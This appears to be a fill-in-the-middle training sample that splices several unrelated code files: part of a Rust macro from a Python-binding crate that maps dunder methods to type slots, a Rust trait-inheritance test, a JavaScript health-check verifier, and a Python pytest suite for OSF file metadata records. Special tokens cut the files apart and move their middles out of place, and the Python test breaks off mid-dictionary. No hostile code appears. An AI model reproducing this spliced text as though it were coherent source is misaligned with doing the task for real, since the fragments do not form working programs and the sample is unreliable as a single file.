$crate::py_error! { "Reflected numeric operator __rmod__ is not supported by py_class! Use __mod__ instead!" }
};
{ { def __rmul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rmul__ is not supported by py_class! Use __mul__ instead!" }
};
{ { def __ror__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __ror__ is not supported by py_class! Use __or__ instead!" }
};
{ { def __round__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__round__ is not supported by py_class! yet." }
};
{ { def __rpow__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rpow__ is not supported by py_class! Use __pow__ instead!" }
};
{ { def __rrshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rrshift__ is not supported by py_class! Use __rshift__ instead!" }
};
{ { def __rshift__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_rshift: $crate::py_class_numeric_slot!(binary $class::__rshift__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __rshift__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __rshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __rshift__" }
};
{ { def __rsub__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rsub__ is not supported by py_class! Use __sub__ instead!" }
};
{ { def __rtruediv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rtruediv__ is not supported by py_class! Use __truediv__ instead!" }
};
{ { def __rxor__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rxor__ is not supported by py_class! Use __xor__ instead!" }
};
{ { def __set__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__set__ is not supported by py_class! yet." }
};
{ { def __setattr__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__setattr__ is not supported by py_class! yet." }
};
{ { def __setitem__(&$slf:ident, $key:ident : Option<&$key_name:ty>, $value:ident : $value_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: {},
sdi_delitem: $sdi_delitem_slot_value:tt,
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: { $crate::py_class_ternary_slot!($class::__setitem__, [Option<&$key_name>], $value_name, $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
sdi_delitem: $sdi_delitem_slot_value,
]
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __setitem__(&$slf,) $res_type; { $($body)* } [{ $key : Option<&$key_name> = {} } { $value : $value_name = {} }] }
}
$members $props
}};
{ { def __setitem__(&$slf:ident, $key:ident : &$key_name:ty, $value:ident : $value_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: {},
sdi_delitem: $sdi_delitem_slot_value:tt,
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: { $crate::py_class_ternary_slot!($class::__setitem__, [&$key_name], $value_name, $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
sdi_delitem: $sdi_delitem_slot_value,
]
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __setitem__(&$slf,) $res_type; { $($body)* } [{ $key : &$key_name = {} } { $value : $value_name = {} }] }
}
$members $props
}};
{ { def __setitem__(&$slf:ident, $key:ident : $key_name:ty, $value:ident : $value_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: {},
sdi_delitem: $sdi_delitem_slot_value:tt,
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: { $crate::py_class_ternary_slot!($class::__setitem__, [$key_name], $value_name, $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
sdi_delitem: $sdi_delitem_slot_value,
]
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __setitem__(&$slf,) $res_type; { $($body)* } [{ $key : $key_name = {} } { $value : $value_name = {} }] }
}
$members $props
}};
{ { def __setitem__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __setitem__" }
};
{ { def __str__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_str: $crate::py_class_unary_slot!($class::__str__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PythonObjectCallbackConverter::<$crate::PyString>(std::marker::PhantomData)),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __str__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __str__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __str__" }
};
{ { def __sub__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_subtract: $crate::py_class_numeric_slot!(binary $class::__sub__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __sub__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __sub__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __sub__" }
};
{ { def __subclasscheck__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__subclasscheck__ is not supported by py_class! yet." }
};
{ { def __truediv__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_true_divide: $crate::py_class_numeric_slot!(binary $class::__truediv__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __truediv__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __truediv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __truediv__" }
};
{ { def __xor__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_xor: $crate::py_class_numeric_slot!(binary $class::__xor__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __xor__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __xor__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __xor__" }
};
{ { $(#[doc=$doc:expr])* def $name:ident (&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $name(&$slf,) $res_type; { $($body)* } [] }
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_class_instance_method!{$py, $class::$name, { concat!($($doc, "\n"),*) } []};
} $props
}};
{ { $(#[doc=$doc:expr])* $visibility:vis def $name:ident (&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $name(&$slf,) $res_type; { $($body)* } [] }
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_class_instance_method!{$py, $class::$name, { concat!($($doc, "\n"),*) } []};
} $props
}};
{ { $(#[doc=$doc:expr])* def $name:ident (&$slf:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, pub, $name(&$slf,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_argparse_parse_plist_impl!{py_class_instance_method {$py, $class::$name, { concat!($($doc, "\n"),*) }} [] ($($p)+,)};
} $props
}};
{ { $(#[doc=$doc:expr])* $visibility:vis def $name:ident (&$slf:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, $visibility, $name(&$slf,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_argparse_parse_plist_impl!{py_class_instance_method {$py, $class::$name, { concat!($($doc, "\n"),*) }} [] ($($p)+,)};
} $props
}};
{ { $(#[doc=$doc:expr])*@classmethod def $name:ident ($cls:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $name($cls: &$crate::PyType,) $res_type; { $($body)* } [] }
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_class_class_method!{$py, $class::$name, { concat!($($doc, "\n"),*) } []};
} $props
}};
{ { $(#[doc=$doc:expr])*@classmethod $visibility:vis def $name:ident ($cls:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $name($cls: &$crate::PyType,) $res_type; { $($body)* } [] }
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_class_class_method!{$py, $class::$name, { concat!($($doc, "\n"),*) } []};
} $props
}};
{ { $(#[doc=$doc:expr])*@classmethod def $name:ident ($cls:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, pub, $name($cls: &$crate::PyType,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_argparse_parse_plist_impl!{py_class_class_method {$py, $class::$name, { concat!($($doc, "\n"),*) }} [] ($($p)+,)};
} $props
}};
{ { $(#[doc=$doc:expr])*@classmethod $visibility:vis def $name:ident ($cls:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, $visibility, $name($cls: &$crate::PyType,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_argparse_parse_plist_impl!{py_class_class_method {$py, $class::$name, { concat!($($doc, "\n"),*) }} [] ($($p)+,)};
} $props
}};
{ { $(#[doc=$doc:expr])* @staticmethod def $name:ident ($($p:tt)*) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist!{
py_class_impl_item { $class, $py, pub, $name() $res_type; { $($body)* } }
($($p)*)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name =
$crate::py_argparse_parse_plist!{
py_class_static_method {$py, $class::$name, {
concat!($($doc, "\n"),*)
} }
($($p)*)
}
;
} $props
}};
{ { $(#[doc=$doc:expr])* @staticmethod $visibility:vis def $name:ident ($($p:tt)*) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist!{
py_class_impl_item { $class, $py, $visibility, $name() $res_type; { $($body)* } }
($($p)*)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name =
$crate::py_argparse_parse_plist!{
py_class_static_method {$py, $class::$name, {
concat!($($doc, "\n"),*)
} }
($($p)*)
}
;
} $props
}};
{ { static $name:ident = $init:expr; $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt $impls:tt
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots $impls
/* members: */ {
$( $member_name = $member_expr; )*
$name = $init;
} $props
}};
{ { $(#[doc=$doc:expr])* @property def $name:ident(&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $name(&$slf,) $res_type; { $($body)* } [] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
{ concat!($($doc, "\n"),*) } $name: $res_type,
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
]
}
}};
{ { @$name:ident.setter def $setter_name:ident(&$slf:ident, $value:ident : Option<Option<&$value_type:ty>> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<Option<&$value_type>> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ Option<&$value_type> ] => $setter_name,
]
}
}};
{ { @$name:ident.setter def $setter_name:ident(&$slf:ident, $value:ident : Option<&$value_type:ty> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<&$value_type> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ &$value_type ] => $setter_name,
]
}
}};
{ { @$name:ident.setter def $setter_name:ident(&$slf:ident, $value:ident : Option<$value_type:ty> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<$value_type> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ $value_type ] => $setter_name,
]
}
}};
{ { $(#[doc=$doc:expr])* @property $visibility:vis def $name:ident(&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $name(&$slf,) $res_type; { $($body)* } [] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
{ concat!($($doc, "\n"),*) } $name: $res_type,
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
]
}
}};
{ { @$name:ident.setter $visibility:vis def $setter_name:ident(&$slf:ident, $value:ident : Option<Option<&$value_type:ty>> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<Option<&$value_type>> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ Option<&$value_type> ] => $setter_name,
]
}
}};
{ { @$name:ident.setter $visibility:vis def $setter_name:ident(&$slf:ident, $value:ident : Option<&$value_type:ty> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<&$value_type> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ &$value_type ] => $setter_name,
]
}
}};
{ { @$name:ident.setter $visibility:vis def $setter_name:ident(&$slf:ident, $value:ident : Option<$value_type:ty> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<$value_type> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ $value_type ] => $setter_name,
]
}
}};
}<|fim▁end|>
|
sdi_delitem: { $crate::py_class_binary_slot!($class::__delitem__, [&$key_name], $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
]
|
<|file_name|>trait-inheritance-call-bound-inherited.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
trait Foo { fn f(&self) -> int; }
trait Bar : Foo { fn g(&self) -> int; }
struct A { x: int }
impl Foo for A { fn f(&self) -> int { 10 } }
impl Bar for A { fn g(&self) -> int { 20 } }
// Call a function on Foo, given a T: Bar
fn gg<T:Bar>(a: &T) -> int {
a.f()
}
pub fn main() {<|fim▁hole|><|fim▁end|>
|
let a = &A { x: 3 };
assert!(gg(a) == 10);
}
|
<|file_name|>verify.js<|end_file_name|><|fim▁begin|>module.exports = function verify(check) {
if (typeof check !== 'object') {
throw new Error('check is not an object');
}
var errors = [];
Object.keys(check).forEach(_verify, check);
if (errors.length > 0) {
throw new Error('Health checks failed: '+ errors.join(', '));
}
return true;<|fim▁hole|> function _verify(key, i) {
if (this[key] === false || this[key] instanceof Error) {
errors.push(key);
}
else if (this[key] && typeof this[key] === 'object' && !Array.isArray(this[key])) {
Object.keys(this[key]).forEach(_verify, this[key]);
}
}
};<|fim▁end|>
| |
<|file_name|>test_file_metadata.py<|end_file_name|><|fim▁begin|>import json
import pytest
import jsonschema
from framework.auth.core import Auth
from framework.exceptions import PermissionsError
from website.settings import DOI_FORMAT, DATACITE_PREFIX
from website.project.licenses import set_license
from osf.models import FileMetadataSchema, NodeLicense, NodeLog
from osf_tests.factories import ProjectFactory, SubjectFactory, AuthUserFactory
from osf.utils.permissions import READ
from api_tests.utils import create_test_file
@pytest.fixture()
def node():
return ProjectFactory()
@pytest.fixture()
def osf_file(node):
return create_test_file(target=node, user=node.creator)
def inject_placeholder_doi(json_data):
# the OSF cannot currently issue DOIs for a file, which is required for datacite schema validation.
# Manually add a placeholder in tests for validation until we handle this better.
placeholder = DOI_FORMAT.format(prefix=DATACITE_PREFIX, guid='placeholder')
json_data['identifier'] = {'identifierType': 'DOI', 'identifier': placeholder}
return json_data
@pytest.mark.django_db
class TestFileMetadataRecordSerializer:
def test_record_created_post_save(self, node, osf_file):
# check there's a record for every FileMetadataSchema
assert FileMetadataSchema.objects.count() > 0
assert osf_file.records.count() == FileMetadataSchema.objects.count()
for record in osf_file.records.all().select_related('file'):
assert record.file == osf_file
def test_serialize_record_datacite(self, node, osf_file):
# Test all of the parts of serialize_json that are auto-generated
# from relationships and properties on the node and file
# add a contributor with an ORCID
contributor = AuthUserFactory()
contributor.external_identity = {
'ORCID': {
'0000-0001-9143-4653': 'VERIFIED'
}
}
contributor.save()
node.add_contributor(contributor, save=False)
# add subjects, tags, license, and guid
tags = ['fish', 'scale']
[osf_file.add_tag(tag, auth=Auth(node.creator), save=False) for tag in tags]
bepress_subject = SubjectFactory(text='BePress Text')
new_subject = SubjectFactory(bepress_subject=bepress_subject)
node.subjects.add(new_subject)
no_license = NodeLicense.objects.get(name='CC0 1.0 Universal')
license_detail = {
'id': no_license.license_id,
'year': '2018',
'copyrightHolders': ['Woop', 'Yeah']
}
set_license(node, license_detail, Auth(node.creator))
osf_file.save()
node.save()
osf_file.target.reload()
record = osf_file.records.get(schema___id='datacite')
serialized_record = json.loads(record.serialize())
# test titles
titles = [title['title'] for title in serialized_record['titles']]
assert osf_file.name in titles
assert node.title in titles
# test dates
dates = [date['date'] for date in serialized_record['dates']]
assert str(osf_file.created) in dates
assert str(osf_file.modified) in dates
assert str(osf_file.created.year) == serialized_record['publicationYear']
# no resource type provided
assert serialized_record['resourceType']['resourceType'] == '(:unas)'
assert serialized_record['resourceType']['resourceTypeGeneral'] == 'Other'
# guid in alternate identifiers
file_guid = osf_file.guids.first()._id
alternate_identifier = serialized_record['alternateIdentifiers'][0]
assert file_guid in alternate_identifier['alternateIdentifier']
# check for tags and subjects
subjects_in_record = [sub['subject'] for sub in serialized_record['subjects']]
assert bepress_subject.text in subjects_in_record
for tag in tags:
assert tag in subjects_in_record
# node license
rights = serialized_record['rightsList'][0]
assert rights['rights'] == no_license.name
assert rights['rightsURI'] == no_license.url
# test most recent version
assert serialized_record['version'] == osf_file.versions.first().identifier
def test_validate(self, node, osf_file):
record = osf_file.records.get(schema___id='datacite')
json_data = json.loads(record.serialize())
assert jsonschema.validate(
inject_placeholder_doi(json_data),
record.schema.schema
) is None
@pytest.mark.django_db
class TestFileMetadataRecord:
@pytest.fixture()
def initial_metadata(self):
return {
'file_description': 'Hello this is a description',
'resource_type': 'Book',
'related_publication_doi': '10.123/fkosf/hello'
}
@pytest.fixture()
def record(self, osf_file):
return osf_file.records.first()
def test_update_record(self, node, record, initial_metadata):
record.metadata = initial_metadata
record.save()
partial_metadata = {
'funders': [
{'funding_agency': 'Hello'},
{'funding_agency': 'Ric Flair', 'grant_number': 'Woooooo'},
]
}
record.update(partial_metadata, user=node.creator)
# Make sure an update creates a node log
assert node.logs.latest().action == NodeLog.FILE_METADATA_UPDATED
# Make sure old fields are cleared
assert list(initial_metadata.keys()) not in list(record.metadata.keys())
full_metadata = {
'funders': [
{'funding_agency': 'Hello'},
{'funding_agency': 'Ric Flair', 'grant_number': 'Woooooo'},
],
'file_description': 'Hey this is a great interesting important file',
'resource_type': 'Funding Submission',
